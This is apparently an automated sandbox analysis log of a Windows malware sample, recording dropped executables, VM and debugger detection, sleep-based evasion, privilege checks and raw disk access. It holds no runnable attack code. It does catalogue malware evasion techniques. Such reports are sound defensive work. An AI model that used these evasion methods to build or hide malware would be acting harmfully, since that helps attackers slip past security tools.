Source: C:\Users\user\Desktop\MiJZ3z4t5K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MiJZ3z4t5K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MiJZ3z4t5K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MiJZ3z4t5K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MiJZ3z4t5K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MiJZ3z4t5K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MiJZ3z4t5K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MiJZ3z4t5K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MiJZ3z4t5K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MiJZ3z4t5K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MiJZ3z4t5K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Switches to a custom stack to bypass stack traces

Source: C:\Windows\Temp\{283DBABD-2529-4833-A804-1C7644FB211C}\.ba\thunderbird.exe	API/Special instruction interceptor: Address: 6BD17C44
Source: C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe	API/Special instruction interceptor: Address: 6C347C44
Source: C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe	API/Special instruction interceptor: Address: 6C347945
Source: C:\Windows\SysWOW64\cmd.exe	API/Special instruction interceptor: Address: 6C343B54

Source: C:\Users\user\Desktop\MiJZ3z4t5K.exe	Memory allocated: 1420000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\MiJZ3z4t5K.exe	Memory allocated: 3170000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\MiJZ3z4t5K.exe	Memory allocated: 2FB0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\MiJZ3z4t5K.exe	Memory allocated: 6F00000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\MiJZ3z4t5K.exe	Memory allocated: 7F00000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\MiJZ3z4t5K.exe	Memory allocated: 8780000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\MiJZ3z4t5K.exe	Memory allocated: 7000000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\MiJZ3z4t5K.exe	Memory allocated: A780000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\MiJZ3z4t5K.exe	Memory allocated: 7400000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\MiJZ3z4t5K.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: C:\Users\user\Desktop\MiJZ3z4t5K.exe	Window / User API: threadDelayed 7615	Jump to behavior
Source: C:\Users\user\Desktop\MiJZ3z4t5K.exe	Window / User API: threadDelayed 2378	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 8281	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1351	Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\smomwacaueqiut			Jump to dropped file
Source: C:\Windows\Temp\{BB1362A0-6A1F-48CD-98E7-9FF49CB04512}\.cr\AppsLo.exe	Dropped PE file which has not been started: C:\Windows\Temp\{283DBABD-2529-4833-A804-1C7644FB211C}\.ba\Trombone.dll			Jump to dropped file

Source: C:\Windows\Temp\{BB1362A0-6A1F-48CD-98E7-9FF49CB04512}\.cr\AppsLo.exe	Evaded block: after key decision
Source: C:\Windows\Temp\{BB1362A0-6A1F-48CD-98E7-9FF49CB04512}\.cr\AppsLo.exe	Evaded block: after key decision
Source: C:\Windows\Temp\{BB1362A0-6A1F-48CD-98E7-9FF49CB04512}\.cr\AppsLo.exe	Evaded block: after key decision

Source: C:\Windows\Temp\{BB1362A0-6A1F-48CD-98E7-9FF49CB04512}\.cr\AppsLo.exe

Evasive API call chain: GetLocalTime,DecisionNodes

Source: C:\Windows\Temp\{BB1362A0-6A1F-48CD-98E7-9FF49CB04512}\.cr\AppsLo.exe

Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep

Source: C:\Windows\Temp\AppsLo.exe	Check user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Windows\Temp\{BB1362A0-6A1F-48CD-98E7-9FF49CB04512}\.cr\AppsLo.exe	Check user administrative privileges: GetTokenInformation,DecisionNodes

Source: C:\Windows\Temp\{BB1362A0-6A1F-48CD-98E7-9FF49CB04512}\.cr\AppsLo.exe

API coverage: 6.0 %

Source: C:\Users\user\Desktop\MiJZ3z4t5K.exe TID: 6496	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\MiJZ3z4t5K.exe TID: 1468	Thread sleep count: 7615 > 30	Jump to behavior
Source: C:\Users\user\Desktop\MiJZ3z4t5K.exe TID: 4000	Thread sleep count: 2378 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4916	Thread sleep count: 8281 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4916	Thread sleep count: 1351 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1472	Thread sleep time: -4611686018427385s >= -30000s	Jump to behavior
Source: C:\Windows\Temp\{BB1362A0-6A1F-48CD-98E7-9FF49CB04512}\.cr\AppsLo.exe TID: 5664	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 2320	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Qjsync.exe TID: 6032	Thread sleep time: -150000s >= -30000s

Source: C:\Windows\System32\svchost.exe

File opened: PhysicalDrive0

Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Windows\Temp\AppsLo.exe	Code function: 6_2_008DFEC6 GetLocalTime followed by cmp: cmp dword ptr [ebp+08h], 05h and CTI: je 008DFF61h	6_2_008DFEC6
Source: C:\Windows\Temp\AppsLo.exe	Code function: 6_2_008DFEC6 GetLocalTime followed by cmp: cmp dword ptr [ebp+08h], 01h and CTI: je 008DFF5Ah	6_2_008DFEC6
Source: C:\Windows\Temp\{BB1362A0-6A1F-48CD-98E7-9FF49CB04512}\.cr\AppsLo.exe	Code function: 7_2_00F8FEC6 GetLocalTime followed by cmp: cmp dword ptr [ebp+08h], 05h and CTI: je 00F8FF61h	7_2_00F8FEC6
Source: C:\Windows\Temp\{BB1362A0-6A1F-48CD-98E7-9FF49CB04512}\.cr\AppsLo.exe	Code function: 7_2_00F8FEC6 GetLocalTime followed by cmp: cmp dword ptr [ebp+08h], 01h and CTI: je 00F8FF5Ah	7_2_00F8FEC6

Source: C:\Windows\Temp\AppsLo.exe	Code function: 6_2_008A3CC4 GetFileAttributesW,GetLastError,GetLastError,SetFileAttributesW,GetLastError,GetTempPathW,GetLastError,FindFirstFileW,GetLastError,SetFileAttributesW,DeleteFileW,GetTempFileNameW,MoveFileExW,MoveFileExW,MoveFileExW,FindNextFileW,GetLastError,GetLastError,GetLastError,GetLastError,RemoveDirectoryW,GetLastError,MoveFileExW,GetLastError,FindClose,	6_2_008A3CC4
Source: C:\Windows\Temp\AppsLo.exe	Code function: 6_2_008E4440 FindFirstFileW,FindClose,	6_2_008E4440
Source: C:\Windows\Temp\AppsLo.exe	Code function: 6_2_008D7B87 FindFirstFileExW,	6_2_008D7B87
Source: C:\Windows\Temp\AppsLo.exe	Code function: 6_2_008B9B43 FindFirstFileW,lstrlenW,FindNextFileW,FindClose,	6_2_008B9B43
Source: C:\Windows\Temp\{BB1362A0-6A1F-48CD-98E7-9FF49CB04512}\.cr\AppsLo.exe	Code function: 7_2_00F94440 FindFirstFileW,FindClose,	7_2_00F94440
Source: C:\Windows\Temp\{BB1362A0-6A1F-48CD-98E7-9FF49CB04512}\.cr\AppsLo.exe	Code function: 7_2_00F87B87 FindFirstFileExW,	7_2_00F87B87
Source: C:\Windows\Temp\{BB1362A0-6A1F-48CD-98E7-9FF49CB04512}\.cr\AppsLo.exe	Code function: 7_2_00F69B43 FindFirstFileW,lstrlenW,FindNextFileW,FindClose,	7_2_00F69B43
Source: C:\Windows\Temp\{BB1362A0-6A1F-48CD-98E7-9FF49CB04512}\.cr\AppsLo.exe	Code function: 7_2_00F53CC4 GetFileAttributesW,GetLastError,GetLastError,SetFileAttributesW,GetLastError,GetTempPathW,GetLastError,FindFirstFileW,GetLastError,SetFileAttributesW,DeleteFileW,GetTempFileNameW,MoveFileExW,MoveFileExW,MoveFileExW,FindNextFileW,GetLastError,GetLastError,GetLastError,GetLastError,RemoveDirectoryW,GetLastError,MoveFileExW,GetLastError,FindClose,	7_2_00F53CC4

Source: C:\Windows\Temp\AppsLo.exe

Code function: 6_2_008E97A5 VirtualQuery,GetSystemInfo,

6_2_008E97A5

Source: C:\Users\user\Desktop\MiJZ3z4t5K.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Temp\{BB1362A0-6A1F-48CD-98E7-9FF49CB04512}\.cr\AppsLo.exe	Thread delayed: delay time: 30000	Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Roaming\
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\

Source: Qjsync.exe, 00000011.00000002.3021047369.00000000026A0000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: noreply@vmware.com0
Source: Qjsync.exe, 00000011.00000002.3021047369.00000000026A0000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: http://www.vmware.com/0
Source: Qjsync.exe, 00000011.00000002.3021047369.00000000026A0000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware, Inc.1!0
Source: cmd.exe, 0000000B.00000002.2917709210.00000000031DC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
Source: svchost.exe, 0000000D.00000002.3342580356.000002021C62B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWp
Source: Qjsync.exe, 00000011.00000002.3021047369.00000000026A0000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: http://www.vmware.com/0/
Source: svchost.exe, 0000000D.00000002.3346330741.0000020221C57000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Qjsync.exe, 00000011.00000002.3021047369.00000000026A0000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware, Inc.1
Source: Qjsync.exe, 00000011.00000002.3021047369.00000000026A0000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware, Inc.0
Source: MiJZ3z4t5K.exe, 00000000.00000002.3341864930.0000000001501000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll>
Source: Qjsync.exe, 00000011.00000002.3020333997.00000000005BC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Windows\Temp\AppsLo.exe	API call chain: ExitProcess graph end node
Source: C:\Windows\Temp\{BB1362A0-6A1F-48CD-98E7-9FF49CB04512}\.cr\AppsLo.exe	API call chain: ExitProcess graph end node

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\Temp\AppsLo.exe

Code function: 6_2_008CE88A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

6_2_008CE88A

Source: C:\Windows\Temp\{BB1362A0-6A1F-48CD-98E7-9FF49CB04512}\.cr\AppsLo.exe

7_2_1006FAB0

Source: C:\Windows\Temp\AppsLo.exe	Code function: 6_2_008D48D8 mov eax, dword ptr fs:[00000030h]		6_2_008D48D8
Source: C:\Windows\Temp\{BB1362A0-6A1F-48CD-98E7-9FF49CB04512}\.cr\AppsLo.exe	Code function: 7_2_00F848D8 mov eax, dword ptr fs:[00000030h]		7_2_00F848D8

Source: C:\Windows\Temp\AppsLo.exe

Code function: 6_2_008A394F GetProcessHeap,RtlAllocateHeap,

6_2_008A394F

Source: C:\Users\user\Desktop\MiJZ3z4t5K.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Windows\Temp\AppsLo.exe	Code function: 6_2_008CE3D8 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	6_2_008CE3D8
Source: C:\Windows\Temp\AppsLo.exe	Code function: 6_2_008CE88A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	6_2_008CE88A
Source: C:\Windows\Temp\AppsLo.exe	Code function: 6_2_008CE9DC SetUnhandledExceptionFilter,	6_2_008CE9DC
Source: C:\Windows\Temp\AppsLo.exe	Code function: 6_2_008D3C76 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	6_2_008D3C76
Source: C:\Windows\Temp\{BB1362A0-6A1F-48CD-98E7-9FF49CB04512}\.cr\AppsLo.exe	Code function: 7_2_00F7E3D8 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	7_2_00F7E3D8
Source: C:\Windows\Temp\{BB1362A0-6A1F-48CD-98E7-9FF49CB04512}\.cr\AppsLo.exe	Code function: 7_2_00F7E88A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	7_2_00F7E88A
Source: C:\Windows\Temp\{BB1362A0-6A1F-48CD-98E7-9FF49CB04512}\.cr\AppsLo.exe	Code function: 7_2_00F7E9DC SetUnhandledExceptionFilter,	7_2_00F7E9DC
Source: C:\Windows\Temp\{BB1362A0-6A1F-48CD-98E7-9FF49CB04512}\.cr\AppsLo.exe	Code function: 7_2_00F83C76 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	7_2_00F83C76
Source: C:\Windows\Temp\{BB1362A0-6A1F-48CD-98E7-9FF49CB04512}\.cr\AppsLo.exe	Code function: 7_2_100671C9 __NMSG_WRITE,_raise,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	7_2_100671C9
Source: C:\Windows\Temp\{BB1362A0-6A1F-48CD-98E7-9FF49CB04512}\.cr\AppsLo.exe	Code function: 7_2_1006386B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	7_2_1006386B
